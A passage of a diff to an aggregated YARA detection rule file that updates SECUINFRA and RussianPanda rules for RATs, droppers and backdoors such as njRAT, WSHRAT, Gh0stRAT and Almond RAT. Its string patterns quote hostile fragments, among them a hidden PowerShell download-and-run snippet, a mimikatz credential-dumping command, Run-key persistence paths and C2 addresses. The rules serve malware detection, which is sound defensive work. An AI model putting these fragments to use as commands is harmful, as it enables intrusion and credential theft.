+		hash0 = "0c7158f9fc2093caf5ea1e34d8b8fffce0780ffd25191fac9c9b52c3208bc450"
+		hash1 = "bd0d25194634b2c74188cfa3be6668590e564e6fe26a6fe3335f95cbc943ce1d"
+		hash2 = "3992d5a725126952f61b27d43bd4e03afa5fa4a694dca7cf8bbf555448795cd6"
+
+	strings:
+		$xor_string0 = "LoadLibraryA" xor
+		$xor_string1 = "urlmon.dll" xor
+		$xor_string2 = "Shell32.dll" xor
+		$xor_string3 = "ShellExecuteA" xor
+		$xor_string4 = "MoveFileA" xor
+		$xor_string5 = "CreateDirectoryA" xor
+		$xor_string6 = "C:\\Windows\\explorer" xor
+		$padding = {000001128341000001128341000001128342000001128342}
+
+	condition:
+		3 of ( $xor_string* ) and $padding
+}
+
+rule SECUINFRA_APT_Bitter_Almond_RAT : FILE
+{
+	meta:
+		description = "Detects Bitter (T-APT-17) Almond RAT (.NET)"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "191fadf9-4f64-56c9-bc2a-a7b4e27ab0fc"
+		date = "2022-06-01"
+		modified = "2022-07-05"
+		reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L82-L108"
+		license_url = "N/A"
+		hash = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
+		logic_hash = "b8d6b95987fe434fc16c87a7bc144f1fe69301a32bb93588df7c2abbfef62d75"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		tlp = "WHITE"
+
+	strings:
+		$function0 = "GetMacid" ascii
+		$function1 = "StartCommWithServer" ascii
+		$function2 = "sendingSysInfo" ascii
+		$dbg0 = "*|END|*" wide
+		$dbg1 = "FILE>" wide
+		$dbg2 = "[Command Executed Successfully]" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and dotnet.version == "v4.0.30319" and filesize > 12KB and filesize < 68KB and any of ( $function* ) and any of ( $dbg* )
+}
+rule SECUINFRA_APT_Bitter_PDB_Paths : FILE
+{
+	meta:
+		description = "Detects Bitter (T-APT-17) PDB Paths"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "e2ad4ac3-45fe-5087-b0d6-a5de16774229"
+		date = "2022-06-22"
+		modified = "2022-07-05"
+		reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L110-L133"
+		license_url = "N/A"
+		logic_hash = "7eb9e4c1b4e0cca070596f3702045756eb32716481bb59f2f8322221804291f5"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		tlp = "WHITE"
+		hash0 = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
+
+	strings:
+		$pdbPath0 = "C:\\Users\\Window 10 C\\Desktop\\COMPLETED WORK\\" ascii
+		$pdbPath1 = "stdrcl\\stdrcl\\obj\\Release\\stdrcl.pdb"
+		$pdbPath2 = "g:\\Projects\\cn_stinker_34318\\"
+		$pdbPath3 = "renewedstink\\renewedstink\\obj\\Release\\stimulies.pdb"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and any of ( $pdbPath* )
 }
 rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE
 {
@@ -158799,33 +159194,33 @@ rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE
 	condition:
 		filesize < 600KB and all of ( $a* ) and 3 of ( $b* ) and 1 of ( $c* )
 }
-rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE
+rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE
 {
 	meta:
-		description = "Detects unknown HTA Dropper"
+		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9"
-		date = "2022-10-02"
-		modified = "2022-02-19"
-		reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21"
+		id = "5296667a-2932-597e-8f49-b7fa755cb387"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23"
 		license_url = "N/A"
-		hash = "1749f4127bba3f7204710286b1252e14"
-		logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75"
+		logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb"
 		score = 75
-		quality = 43
-		tags = "DROPPER, HTA, FILE"
+		quality = 70
+		tags = "VBS, NJRAT, DROPPER, FILE"
 
 	strings:
-		$a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >"
-		$a2 = "Function XmlTime(t)"
-		$a3 = "C:\\ProgramData\\"
-		$a4 = "wscript.exe"
-		$a5 = "Array" nocase
-		$b = "chr" nocase
+		$a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide
+		$a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide
+		$b1 = "CreateObject(\"WScript.Shell\")" wide
+		$b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide
+		$b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide
+		$b4 = "& DGRP & NvWt & DGRP &" wide
+		$b5 = "= ogidoC$" wide
 
 	condition:
-		filesize < 70KB and all of ( $a* ) and #b > 7
+		filesize < 300KB and ( ( 1 of ( $a* ) ) or ( 2 of ( $b* ) ) )
 }
 rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE
 {
@@ -158854,33 +159249,59 @@ rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE
 	condition:
 		filesize < 500KB and $mz and 3 of ( $a* )
 }
-rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE
+rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE
+{
+	meta:
+		description = "Detects unknown HTA Dropper"
+		author = "SECUINFRA Falcon Team"
+		id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9"
+		date = "2022-10-02"
+		modified = "2022-02-19"
+		reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21"
+		license_url = "N/A"
+		hash = "1749f4127bba3f7204710286b1252e14"
+		logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75"
+		score = 75
+		quality = 43
+		tags = "DROPPER, HTA, FILE"
+
+	strings:
+		$a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >"
+		$a2 = "Function XmlTime(t)"
+		$a3 = "C:\\ProgramData\\"
+		$a4 = "wscript.exe"
+		$a5 = "Array" nocase
+		$b = "chr" nocase
+
+	condition:
+		filesize < 70KB and all of ( $a* ) and #b > 7
+}
+rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE
 {
 	meta:
 		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "5296667a-2932-597e-8f49-b7fa755cb387"
-		date = "2022-02-27"
+		id = "a07f80e4-56c3-5b75-be64-648bc1fde964"
+		date = "2022-02-19"
 		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23"
+		reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19"
 		license_url = "N/A"
-		logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb"
+		logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed"
 		score = 75
-		quality = 70
-		tags = "VBS, NJRAT, DROPPER, FILE"
+		quality = 20
+		tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE"
+		version = "0.1"
 
 	strings:
-		$a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide
-		$a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide
-		$b1 = "CreateObject(\"WScript.Shell\")" wide
-		$b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide
-		$b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide
-		$b4 = "& DGRP & NvWt & DGRP &" wide
-		$b5 = "= ogidoC$" wide
+		$a1 = "$$$"
+		$a2 = "microsoft.xmldom"
+		$a3 = "eval"
+		$a4 = "join(\"\")"
 
 	condition:
-		filesize < 300KB and ( ( 1 of ( $a* ) ) or ( 2 of ( $b* ) ) )
+		( uint16( 0 ) == 0x7566 or uint16( 0 ) == 0x6176 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x660a ) and filesize < 60KB and all of ( $a* )
 }
 rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE
 {
@@ -158908,35 +159329,204 @@ rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE
 	condition:
 		filesize < 1500KB and $a1 and #b3 > 3 and #b1 > 2 and $b2
 }
+rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - SecuInfra"
+		author = "SECUINFRA Falcon Team"
+		id = "80f84c2f-7af0-55c1-bc06-d605beae3e33"
+		date = "2022-02-21"
+		modified = "2022-02-21"
+		reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18"
+		license_url = "N/A"
+		logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358"
+		score = 75
+		quality = 70
+		tags = "FILE"
 
-rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716
+	strings:
+		$a1 = "http://3.145.46.6/"
+		$b1 = "Const HIDDEN_WINDOW = 0"
+		$b2 = "GetObject(\"winmgmts:\\\\"
+		$c = "replace("
+
+	condition:
+		filesize < 10KB and ( $a1 or ( all of ( $b* ) and #c > 10 ) )
+}
+rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE
 {
 	meta:
-		description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db"
-		date = "2023-03-07"
-		modified = "2023-03-07"
-		reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20"
+		description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory"
+		author = "SECUINFRA Falcon Team"
+		id = "65aad597-c5fe-50c3-8970-19fb502f1602"
+		date = "2022-02-21"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25"
 		license_url = "N/A"
-		logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297"
-		score = 50
-		quality = 45
-		tags = "CVE-2023-21716"
-		tlp = "CLEAR"
+		logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe"
+		score = 60
+		quality = 25
+		tags = "FILE"
+		version = "0.1"
 
 	strings:
-		$fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/
+		$create = "New-ScheduledTaskAction"
+		$execute = "-Execute"
+		$trigger = "New-ScheduledTaskTrigger"
+		$at_param = "-At"
+		$register = "Register-ScheduledTask"
+		$action = "-Action"
+		$path1 = "C:\\ProgramData\\"
+		$path2 = "C:\\Windows\\Temp"
+		$path3 = "AppData\\Local"
 
 	condition:
-		uint32be( 0x0 ) == 0x7B5C7274 and !fonttbl_len [ 1 ] > 256 and console.log ( "[!] Inflated fonttable with length: " , !fonttbl_len [ 1 ] )
+		filesize < 30KB and 1 of ( $path* ) and ( $create and $execute ) or ( $trigger and $at_param ) or ( $register and $action )
+}
+rule SECUINFRA_SUSP_Reverse_Run_Key : FILE
+{
+	meta:
+		description = "Detects a Reversed Run Key"
+		author = "SECUINFRA Falcon Team"
+		id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38"
+		license_url = "N/A"
+		logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e"
+		score = 65
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
+
+	condition:
+		filesize < 100KB and $run
+}
+rule SECUINFRA_MAL_Nw0Rm : FILE
+{
+	meta:
+		description = "Detect the final RAT dropped by N-W0rm"
+		author = "SECUINFRA Falcon Team"
+		id = "b014ce63-33ec-51df-a529-0c197dac2d7a"
+		date = "2022-03-02"
+		modified = "2022-02-07"
+		reference = "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/n-w0rm.yar#L1-L24"
+		license_url = "N/A"
+		hash = "08587e04a2196aa97a0f939812229d2d"
+		logic_hash = "04078c57c1aa0065fceec7dc92b201bda23de1c5f5a940803a81250bdd685736"
+		score = 75
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$a1 = "N-W0rm" fullword wide
+		$a2 = "N_W0rm" fullword wide
+		$a3 = "|NW|" fullword wide
+		$b1 = "Select * from AntivirusProduct" fullword wide
+		$b2 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File" fullword wide
+		$b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
+		$b4 = "killer" fullword wide
+		$b5 = "nyanmoney02.duckdns.org" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 2 of ( $a* ) and 2 of ( $b* )
+}
+
+rule SECUINFRA_MAL_Njrat : FILE
+{
+	meta:
+		description = "No description has been set in the source file - SecuInfra"
+		author = "SECUINFRA Falcon Team"
+		id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35"
+		license_url = "N/A"
+		logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126"
+		hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa"
+		hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944"
+
+	strings:
+		$mutex_1 = "02ddd2742fd5023579c925948979506c" wide
+		$mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide
+		$mutex_3 = "f7d3b79624476341312866012d0bbf19" wide
+		$a1 = "\"|'|'|\"" wide
+		$a2 = "SEE_MASK_NOZONECHECKS" wide
+		$b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$b2 = "netsh firewall" wide
+		$b3 = "[ENTER]\\r\\n" wide
+		$b4 = "Execute ERROR" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and pe.imports ( "avicap32.dll" ) and 1 of ( $mutex_* ) or ( 1 of ( $a* ) and 2 of ( $b* ) )
+}
+rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE
+{
+	meta:
+		description = "Detects the final Payload of WSHART"
+		author = "SECUINFRA Falcon Team"
+		id = "8db5e349-c83e-53c3-a44d-cfe4732fe08d"
+		date = "2022-12-02"
+		modified = "2022-02-13"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/wshrat.yar#L2-L44"
+		license_url = "N/A"
+		hash = "b7f53ccc492400290016e802e946e526"
+		logic_hash = "12d893f0ca83e805fa570d3f72eb733c8d8b1ae6c0d37bf179ac675d108c7412"
+		score = 75
+		quality = 68
+		tags = "RAT, JAVASCRIPT, WSHRAT, FILE"
+
+	strings:
+		$function1 = "runBinder"
+		$function2 = "getBinder"
+		$function3 = "Base64Encode"
+		$function4 = "payloadLuncher"
+		$function5 = "getMailRec"
+		$function6 = "getHbrowser"
+		$function7 = "passgrabber"
+		$function8 = "getRDP"
+		$function9 = "getUVNC"
+		$function10 = "getConfig"
+		$function11 = "getKeyLogger"
+		$function12 = "enumprocess"
+		$function13 = "cmdshell"
+		$function14 = "faceMask"
+		$function15 = "upload"
+		$function16 = "download"
+		$function17 = "sitedownloader"
+		$function18 = "servicestarter"
+		$function19 = "payloadLuncher"
+		$function20 = "keyloggerstarter"
+		$function21 = "reverserdp"
+		$function22 = "reverseproxy"
+		$function23 = "decode_pass"
+		$function24 = "disableSecurity"
+		$function25 = "installsdk"
+		$cmd1 = "osversion = eval(osversion)"
+		$cmd2 = "download(cmd[1],cmd[2])"
+		$cmd3 = "keyloggerstarter(cmd[1]"
+		$cmd4 = "decode_pass(retcmd);"
+
+	condition:
+		filesize < 2MB and 2 of ( $cmd* ) and 12 of ( $function* )
 }
 /*
  * YARA Rule Set
  * Repository Name: RussianPanda
  * Repository: https://github.com/RussianPanda95/Yara-Rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 1ce9c0dec191b43d51ceb34234a12e63970b252c
  * Number of Rules: 86
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -158946,423 +159536,444 @@ rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716
  *
  * NO LICENSE SET
  */
-rule RUSSIANPANDA_Johnwalkertexasloader_V2 : FILE
+rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE
 {
 	meta:
-		description = "Detects JohnWalkerTexasLoader (JWTL)"
+		description = "Detects XRed backdoor"
 		author = "RussianPanda"
-		id = "1a05245e-5ee0-5916-801b-4f7f3a573e71"
-		date = "2024-10-15"
-		modified = "2024-10-15"
+		id = "61f5fcb8-9351-5db0-8bce-123c96d2a443"
+		date = "2024-02-09"
+		modified = "2024-02-09"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JWTL/JohnWalkerTexasLoader_v2.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18"
 		license_url = "N/A"
-		hash = "9f6bf0473f5541d84faad4c33a0bc5b1928fceb5938f2d6a7e6e02b7f0980341"
-		logic_hash = "70cbf6cf0602dc8087f4845451d13d0043872733615050161c077e3346387873"
+		hash = "9e1fbae3a659899dde8db18a32daa46a"
+		logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5"
 		score = 75
-		quality = 81
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = {61 00 48 00 52 00 30 00 63 00 48 00 4D 00 36 00 4C 00 79 00 39}
-		$s2 = {73 65 6E 64 6F 70 65 6E 31}
-		$s3 = {73 65 6E 64 6F 70 65 6E 32}
+		$s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65}
+		$s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66}
+		$s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65}
+		$s4 = {45 58 45 55 52 4C 31}
+		$s5 = {49 4E 49 55 52 4C 33}
+		$s6 = {58 52 65 64 35 37}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule RUSSIANPANDA_Johnwalkertexasloader : FILE
+rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE
 {
 	meta:
-		description = "Detects JohnWalkerTexasLoader (JWTL)"
+		description = "Detects SmartApeSG initial JavaScript file"
 		author = "RussianPanda"
-		id = "af91ab47-245b-58f2-a35a-1cb408b2229a"
-		date = "2024-10-10"
-		modified = "2024-10-10"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JWTL/JohnWalkerTexasLoader.yar#L1-L16"
+		id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a"
+		date = "2024-01-11"
+		modified = "2024-01-11"
+		reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18"
 		license_url = "N/A"
-		hash = "3784fc39dc5c0dec08ad0a49bbbb990359e313a9fa87e6842fd67ed7cc1c0baa"
-		logic_hash = "414be3219d12823639d140d132a9bbc2ca7bf8c44d0c560e4a49b76323be3f8a"
+		hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15"
+		logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "?status=1&wallets=" ascii wide
-		$s2 = "/api.php" ascii wide
-		$s3 = "/api-debug.php" ascii wide
+		$a1 = "'GE'+'T'"
+		$a2 = "'GE','T'"
+		$s1 = "pt.Creat"
+		$s2 = "L2.ServerX"
+		$s3 = "ponseText"
+		$s4 = "MLHTTP.6.0"
+		$s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 1MB and any of ( $a* )
 }
-rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE
+rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE
 {
 	meta:
-		description = "Detects NET_Reactor_packer 12-2023 used in MetaStealer"
+		description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT"
 		author = "RussianPanda"
-		id = "5d4f62d2-6a27-53af-9b03-61daa99c10a4"
-		date = "2023-12-29"
-		modified = "2023-12-30"
+		id = "2a614e11-be32-5bf1-9fd1-da224f0a644e"
+		date = "2024-01-11"
+		modified = "2024-01-12"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer_12-2023_packer.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "1951d8b05f11b8a77a5bf792ad2b0ad95b8dede936ab5cd0699383468c3c97a8"
+		hash = "67d8f84b37732cf85e05b327ad6b6a9f"
+		logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {C7 84 24 80 02 00 00 24 02 00 00 C6 44 24}
-		$s2 = "mscoree.dll" wide
-		$s3 = {43 61 76 69 6c 73 20 43 6f 72 70 2e 20 32 30 31 30}
-		$s4 = {80 F1 E7 80 F2 44 [16] 80 F1 4B 80 F2 23}
+		$x1 = "powershell.exe -Ex Bypass -NoP -C $"
+		$x2 = "Get-Random -Minimum -1000 -Maximum 1000"
+		$s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
+		$s2 = "=new ActiveXObject('W"
+		$s3 = "System.Net.WebClient).DownloadString($"
+		$s4 = "FromBase64String"
+		$s5 = "Start-Process -FilePath $"
 
 	condition:
-		3 of ( $s* ) and filesize < 600KB
+		filesize < 1MB and ( ( 1 of ( $x* ) and 3 of them ) or 5 of them )
 }
-
-rule RUSSIANPANDA_Metastealer_Core_Payload
+rule RUSSIANPANDA_Gh0Strat : FILE
 {
 	meta:
-		description = "Detects MetaStealer Core Payload"
+		description = "Detects Gh0stRAT"
 		author = "RussianPanda"
-		id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483"
-		date = "2023-12-29"
-		modified = "2023-12-29"
+		id = "db310549-feed-57b8-9ec0-232b6eda62f9"
+		date = "2024-07-09"
+		modified = "2024-07-09"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Gh0stRAT/Gh0stRAT.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241"
+		hash = "678b06ecdbc9b186788cf960332566f9"
+		logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "FileScannerRule"
-		$s2 = "TreeObject"
-		$s3 = "Schema"
-		$s4 = "StringDecrypt"
-		$s5 = "AccountDetails"
+		$s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s"
+		$s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit"
+		$s3 = "Http/1.1 403 Forbidden"
+		$s4 = "WinSta0\\Default"
 
 	condition:
-		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Metastealer
+rule RUSSIANPANDA_Win_Mal_Gobitloader : FILE
 {
 	meta:
-		description = "Detects the old version of MetaStealer 11-2023"
+		description = "Detects GoBitLoader"
 		author = "RussianPanda"
-		id = "c178630b-d188-5faf-86b3-436894241d77"
-		date = "2023-11-16"
-		modified = "2023-12-30"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer.yar#L2-L19"
+		id = "4ebc7987-c1b2-5682-943f-7c19a9cb6b36"
+		date = "2024-03-24"
+		modified = "2024-03-24"
+		reference = "https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys"
